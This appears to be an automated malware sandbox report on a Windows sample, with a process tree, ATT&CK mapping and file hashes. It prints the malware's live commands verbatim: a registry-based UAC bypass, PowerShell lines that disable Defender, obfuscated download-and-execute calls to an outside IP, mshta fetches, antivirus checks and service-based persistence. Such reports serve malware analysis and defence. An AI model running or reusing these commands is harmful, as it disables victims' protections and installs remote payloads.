C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\4911.vbs" /f5⤵
- Modifies registry class
PID:2996
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f5⤵
- Modifies registry class
PID:4816
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe4⤵PID:3744
-
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe5⤵PID:4624
-
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\4911.vbs6⤵PID:400
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" interface ip set dns "Ethernet" dhcp7⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1572
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\4911.vbs4⤵PID:4968
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:4416
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵
- Modifies registry class
PID:480
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\filer.exe"C:\Users\Admin\AppData\Local\Temp\a\filer.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3840 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\a\filer.exe4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1496
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4368
-
-
C:\Windows\System32\Wbem\wmic.exewmic os get Caption4⤵PID:4132
-
-
C:\Windows\System32\Wbem\wmic.exewmic cpu get Name4⤵PID:2584
-
-
C:\Windows\System32\Wbem\wmic.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:4844
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:900
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe"C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4588 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri "https://ratsinthehole.com/vvvv/yVdlbFlx" -OutFile "C:\Users\Public\Guard.exe""4⤵
- Command and Scripting Interpreter: PowerShell
PID:1232
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Xworm%20V5.6.exe"C:\Users\Admin\AppData\Local\Temp\a\Xworm%20V5.6.exe"3⤵
- Executes dropped EXE
PID:2088
-
-
C:\Users\Admin\AppData\Local\Temp\a\XClient.exe"C:\Users\Admin\AppData\Local\Temp\a\XClient.exe"3⤵
- Executes dropped EXE
PID:4000
-
-
C:\Users\Admin\AppData\Local\Temp\a\333.exe"C:\Users\Admin\AppData\Local\Temp\a\333.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2152
-
-
C:\Users\Admin\AppData\Local\Temp\a\VBVEd6f.exe"C:\Users\Admin\AppData\Local\Temp\a\VBVEd6f.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:480
-
-
C:\Users\Admin\AppData\Local\Temp\a\test12.exe"C:\Users\Admin\AppData\Local\Temp\a\test12.exe"3⤵
- Executes dropped EXE
PID:1088
-
-
C:\Users\Admin\AppData\Local\Temp\a\test6.exe"C:\Users\Admin\AppData\Local\Temp\a\test6.exe"3⤵
- Executes dropped EXE
PID:2680
-
-
C:\Users\Admin\AppData\Local\Temp\a\test14.exe"C:\Users\Admin\AppData\Local\Temp\a\test14.exe"3⤵
- Executes dropped EXE
PID:2344
-
-
C:\Users\Admin\AppData\Local\Temp\a\pantest.exe"C:\Users\Admin\AppData\Local\Temp\a\pantest.exe"3⤵
- Executes dropped EXE
PID:2976
-
-
C:\Users\Admin\AppData\Local\Temp\a\test9.exe"C:\Users\Admin\AppData\Local\Temp\a\test9.exe"3⤵
- Executes dropped EXE
PID:1564
-
-
C:\Users\Admin\AppData\Local\Temp\a\test10-29.exe"C:\Users\Admin\AppData\Local\Temp\a\test10-29.exe"3⤵
- Executes dropped EXE
PID:960
-
-
C:\Users\Admin\AppData\Local\Temp\a\test19.exe"C:\Users\Admin\AppData\Local\Temp\a\test19.exe"3⤵
- Executes dropped EXE
PID:2708
-
-
C:\Users\Admin\AppData\Local\Temp\a\test10.exe"C:\Users\Admin\AppData\Local\Temp\a\test10.exe"3⤵
- Executes dropped EXE
PID:4396
-
-
C:\Users\Admin\AppData\Local\Temp\a\test_again4.exe"C:\Users\Admin\AppData\Local\Temp\a\test_again4.exe"3⤵
- Executes dropped EXE
PID:3868
-
-
C:\Users\Admin\AppData\Local\Temp\a\test23.exe"C:\Users\Admin\AppData\Local\Temp\a\test23.exe"3⤵
- Executes dropped EXE
PID:4208
-
-
C:\Users\Admin\AppData\Local\Temp\a\test5.exe"C:\Users\Admin\AppData\Local\Temp\a\test5.exe"3⤵
- Executes dropped EXE
PID:4060
-
-
C:\Users\Admin\AppData\Local\Temp\a\test11.exe"C:\Users\Admin\AppData\Local\Temp\a\test11.exe"3⤵
- Executes dropped EXE
PID:1844
-
-
C:\Users\Admin\AppData\Local\Temp\a\test20.exe"C:\Users\Admin\AppData\Local\Temp\a\test20.exe"3⤵
- Executes dropped EXE
PID:1948
-
-
C:\Users\Admin\AppData\Local\Temp\a\test_again3.exe"C:\Users\Admin\AppData\Local\Temp\a\test_again3.exe"3⤵
- Executes dropped EXE
PID:3248
-
-
C:\Users\Admin\AppData\Local\Temp\a\test16.exe"C:\Users\Admin\AppData\Local\Temp\a\test16.exe"3⤵
- Executes dropped EXE
PID:5060
-
-
C:\Users\Admin\AppData\Local\Temp\a\test13.exe"C:\Users\Admin\AppData\Local\Temp\a\test13.exe"3⤵
- Executes dropped EXE
PID:1812
-
-
C:\Users\Admin\AppData\Local\Temp\a\test_again2.exe"C:\Users\Admin\AppData\Local\Temp\a\test_again2.exe"3⤵
- Executes dropped EXE
PID:4352
-
-
C:\Users\Admin\AppData\Local\Temp\a\test15.exe"C:\Users\Admin\AppData\Local\Temp\a\test15.exe"3⤵
- Executes dropped EXE
PID:968
-
-
C:\Users\Admin\AppData\Local\Temp\a\test18.exe"C:\Users\Admin\AppData\Local\Temp\a\test18.exe"3⤵
- Executes dropped EXE
PID:452
-
-
C:\Users\Admin\AppData\Local\Temp\a\test21.exe"C:\Users\Admin\AppData\Local\Temp\a\test21.exe"3⤵
- Executes dropped EXE
PID:2912
-
-
C:\Users\Admin\AppData\Local\Temp\a\test22.exe"C:\Users\Admin\AppData\Local\Temp\a\test22.exe"3⤵
- Executes dropped EXE
PID:896
-
-
C:\Users\Admin\AppData\Local\Temp\a\test8.exe"C:\Users\Admin\AppData\Local\Temp\a\test8.exe"3⤵
- Executes dropped EXE
PID:3260
-
-
C:\Users\Admin\AppData\Local\Temp\a\test7.exe"C:\Users\Admin\AppData\Local\Temp\a\test7.exe"3⤵
- Executes dropped EXE
PID:2836
-
-
C:\Users\Admin\AppData\Local\Temp\a\test-again.exe"C:\Users\Admin\AppData\Local\Temp\a\test-again.exe"3⤵
- Executes dropped EXE
PID:3360
-
-
C:\Users\Admin\AppData\Local\Temp\a\test17.exe"C:\Users\Admin\AppData\Local\Temp\a\test17.exe"3⤵
- Executes dropped EXE
PID:4392
-
-
C:\Users\Admin\AppData\Local\Temp\a\vg9qcBa.exe"C:\Users\Admin\AppData\Local\Temp\a\vg9qcBa.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4800 -
C:\Users\Admin\AppData\Local\Temp\a\vg9qcBa.exe"C:\Users\Admin\AppData\Local\Temp\a\vg9qcBa.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3764
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\win.exe"C:\Users\Admin\AppData\Local\Temp\a\win.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:4768 -
C:\Windows\SysWOW64\route.exeroute print4⤵
- System Location Discovery: System Language Discovery
PID:3400
-
-
C:\Windows\SysWOW64\arp.exearp -a 10.127.0.14⤵
- Network Service Discovery
- System Location Discovery: System Language Discovery
PID:2780
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\x4lburt.exe"C:\Users\Admin\AppData\Local\Temp\a\x4lburt.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2276 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\computerlead.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\computerlead.exe4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1828 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
PID:4192 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4192 -s 3366⤵
- Program crash
PID:8
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\9758xBqgE1azKnB.exe"C:\Users\Admin\AppData\Local\Temp\a\9758xBqgE1azKnB.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3764
-
-
C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1840 -
C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2264
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\0fVlNye.exe"C:\Users\Admin\AppData\Local\Temp\a\0fVlNye.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2636 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Bukkake Bukkake.cmd && Bukkake.cmd4⤵
- System Location Discovery: System Language Discovery
PID:3560 -
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:1388
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa opssvc"5⤵
- System Location Discovery: System Language Discovery
PID:1356
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:3116
-
-
C:\Windows\SysWOW64\findstr.exefindstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"5⤵
- System Location Discovery: System Language Discovery
PID:2404
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 294425⤵
- System Location Discovery: System Language Discovery
PID:1760
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Wendy + ..\Psychiatry + ..\Rid + ..\Games + ..\Norway + ..\Matching + ..\Jungle + ..\Elliott + ..\Jpg + ..\Americans + ..\Exhibits + ..\Peeing + ..\Typical + ..\Innocent + ..\Seafood + ..\Nervous + ..\Households + ..\Ai + ..\Hotel + ..\Holdem + ..\Drums + ..\Carlo + ..\Tm + ..\Landscape + ..\Resolutions + ..\Def + ..\Lambda + ..\Biodiversity + ..\Odds + ..\Smithsonian + ..\Blvd + ..\Actual + ..\Guy + ..\Expert + ..\Delaware + ..\Eagle + ..\Eugene + ..\Exempt + ..\Same + ..\Ebooks + ..\Individuals + ..\Sucking + ..\Chan + ..\Turns + ..\Satin + ..\Dealing + ..\Result + ..\Through + ..\Realized l5⤵
- System Location Discovery: System Language Discovery
PID:3140
-
-
C:\Users\Admin\AppData\Local\Temp\29442\Reynolds.comReynolds.com l5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1560 -
C:\Users\Admin\AppData\Local\Temp\29442\Reynolds.comC:\Users\Admin\AppData\Local\Temp\29442\Reynolds.com6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2012 -
C:\Windows\explorer.exeexplorer.exe7⤵
- Suspicious use of FindShellTrayWindow
PID:1464 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:5052
-
-
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵
- System Location Discovery: System Language Discovery
PID:4320
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\IMG001.exe"C:\Users\Admin\AppData\Local\Temp\a\IMG001.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2652 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe4⤵
- System Location Discovery: System Language Discovery
PID:1472 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tftp.exe5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:2408
-
-
-
C:\Users\Admin\AppData\Local\Temp\tftp.exe"C:\Users\Admin\AppData\Local\Temp\tftp.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4012
-
-
C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1684 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe5⤵
- System Location Discovery: System Language Discovery
PID:3468 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tftp.exe6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:2732
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\rh.exe"C:\Users\Admin\AppData\Local\Temp\a\rh.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:2656 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2656 -s 6124⤵
- Program crash
PID:2400
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\file.exe"C:\Users\Admin\AppData\Local\Temp\a\file.exe"3⤵
- Executes dropped EXE
PID:4912 -
C:\Windows\SYSTEM32\wscript.exe"wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js4⤵PID:3492
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
PID:3468 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"6⤵PID:1404
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c mshta http://176.113.115.178/Windows-Update7⤵PID:4448
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:3836
-
-
C:\Windows\system32\mshta.exemshta http://176.113.115.178/Windows-Update8⤵
- Blocklisted process makes network request
PID:1696 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X9⤵
- UAC bypass
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:2004 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\10⤵
- Command and Scripting Interpreter: PowerShell
PID:3144
-
-
C:\Users\Admin\AppData\Roaming\LB31.exe"C:\Users\Admin\AppData\Roaming\LB31.exe"10⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:2956 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force11⤵
- Command and Scripting Interpreter: PowerShell
PID:1028
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart11⤵PID:4424
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart12⤵PID:1676
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc11⤵
- Launches sc.exe
PID:3948
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc11⤵
- Launches sc.exe
PID:4988
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv11⤵
- Launches sc.exe
PID:5096
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits11⤵
- Launches sc.exe
PID:3584
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc11⤵
- Launches sc.exe
PID:4540
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 011⤵
- Power Settings
PID:4376
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 011⤵
- Power Settings
PID:2624
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 011⤵
- Power Settings
PID:2580
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 011⤵
- Power Settings
PID:2172
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe11⤵PID:4756
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "LIB"11⤵
- Launches sc.exe
PID:2496
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto"11⤵
- Launches sc.exe
PID:3256
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog11⤵
- Launches sc.exe
PID:4888
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "LIB"11⤵
- Launches sc.exe
PID:1384 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:4832
-
-
-
-
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:5044
-
-
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url" & echo URL="C:\Users\Admin\AppData\Local\CyberSphere Dynamics\ZeusChat.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url" & exit2⤵
- Drops startup file
PID:868
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3436
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3452
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3812
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3880
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3892
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵PID:3964
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:4260
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵PID:4400
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:4884
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:3328
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:1956
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:4524
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:1708
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:1912
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:2936
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 3336 -ip 33361⤵PID:1660
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 4352 -ip 43521⤵PID:5076
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵PID:2984
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4192 -ip 41922⤵PID:3464
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2656 -ip 26562⤵PID:1828
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:1152
-
C:\ProgramData\Mig\Mig.exeC:\ProgramData\Mig\Mig.exe1⤵
- Checks BIOS information in registry
- Executes dropped EXE
PID:2916 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
PID:404 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5036
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
2JavaScript
1PowerShell
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Power Settings
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
1Indicator Removal
1File Deletion
1Modify Registry
3Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.0MB
MD5c63860691927d62432750013b5a20f5f
SHA103678170aadf6bab2ac2b742f5ea2fd1b11feca3
SHA25669d2f1718ea284829ddf8c1a0b39742ae59f2f21f152a664baa01940ef43e353
SHA5123357cb6468c15a10d5e3f1912349d7af180f7bd4c83d7b0fd1a719a0422e90d52be34d9583c99abeccdb5337595b292a2aa025727895565f3a6432cab46148de
-
Filesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
Filesize
1KB
MD55b74da6778ccaa0e1ca4ae7484775943
SHA10a2f6f315a0ca1a0366b509aec7b13c606645654
SHA256172282931d7eeb60228e6b9b4b913fd78c73f2a7855620f35fb24a5c847b6c78
SHA51220b4cb7174f49b22426b249f1dfc8f6273f50d1502536e773f4dcd073bf027f2a554d2437c2dc628dbe021c5c3b968b2d89f810ff1bb19630c1560e7feee1a1a
-
Filesize
12KB
MD5ba8c4980c202314c46e41de2cee1b8c4
SHA1382df06e3fb72bd10bd11e2fde7fa7277eea9282
SHA2566ec0fa77e396d00ccf0e972a96210ae38f8629b266db41b35134cbd58edbf675
SHA5124125ca7fd5e1fac2e5b2829ab9fc2f881dbfe29800c290d26c195d52bc4c23496badec3e50ed070c49b37db844ad3cde972d0d555a13df7a6bc3365bf7a98ea7
-
Filesize
12KB
MD5fd90c0672114f6edba96efa50ea5cc99
SHA135b33fc6fb152fa02b854a1d88c345edcf39f11a
SHA256c2b9519026bc479d7d4d33dd4029ae88037f25b36440ab33355b311054dba141
SHA5122368e11f49a5b97405562e86f047e7a744ef3a1e3f2cf2039e089fcc184d9c147b8d820858c87ac90ed4097cf4170088b529ef1e8d99da2f889519299fab02c1
-
Filesize
16KB
MD5fdfd4f0c87cc405795e9c9ba4fde954a
SHA164546eba51d85057159b762d1a483309a2ea67b3
SHA256d38eb889c091dcb657aed191edc772984d6906494f0f06d40985f9cde5c80532
SHA512c83b420aec4b07cbcde4e1616e837bba195bca00ab5796884cea26d4128f884696d34cf51f18125c12f1b5ec518ca21b4bcd774a3b77a0cb4823c12efebb5090
-
Filesize
944B
MD56344564097353c8e7e68991fffa80d88
SHA12ac4d108a30ec3fbd2938b0563eb912415ea7c62
SHA256d0af6d69f8bc0c98e9fb61dead6327bbc8b4f5292529313515382d8f883de0da
SHA512e2b37a9001a91cb05483d72f88bd70a61ca5655939c2290fd1580710eec9d8d26a5fedbcb5223f5413b5dcc46f1d8b6b408e57be0e4ad4b37b55cbce9023a303
-
Filesize
944B
MD5795938d4c6e7dbca544ec4bdca81c53a
SHA10ca41665a9b6b0c3159211aed5fc595de98afb6b
SHA256dc400265ecb7f850894b2b648b956964d4fe75639f76bb3634a1f73c3182dbcb
SHA51219d36e5b648a1d5faa7d7d67d454f0157f99a546532bcf538b1ff81b4acc126124ea937e143a49eb91dce2e657a53378b327078aaacb5c2a8c54a5249a5efff5
-
Filesize
114B
MD534b33b5a437e20d03d79b62a797dfe99
SHA19b57b598a7e9d66157a05a44bc7c097bf5486e6c
SHA256f920f526773c0565072fcfd250319c9dd53b9197d448b9d29307598e0fa004e1
SHA512757be8161af2eb4af36772e2e0d912e0967540cb42ef6ef8cd85f28edb478756c99d9e7a6fef04b16e6bf63a3dc9ddb9c2adf490e8d9ae2ca0e3e9b76ef6fa6c
-
Filesize
125B
MD58b4ed5c47fdddbeba260ef11cfca88c6
SHA1868f11f8ed78ebe871f9da182d053f349834b017
SHA256170226b93ac03ac3178c0429577626add00665e1d71be650a4c46674f6e262a5
SHA51287e5bcaa143e616c365557f5af73e131a10eb380016633b8c7e38c83b0a216a8f6768cfa0166fad208d47830808444517e57d07d850ff2bd575ca67bad9eabdf
-
Filesize
117B
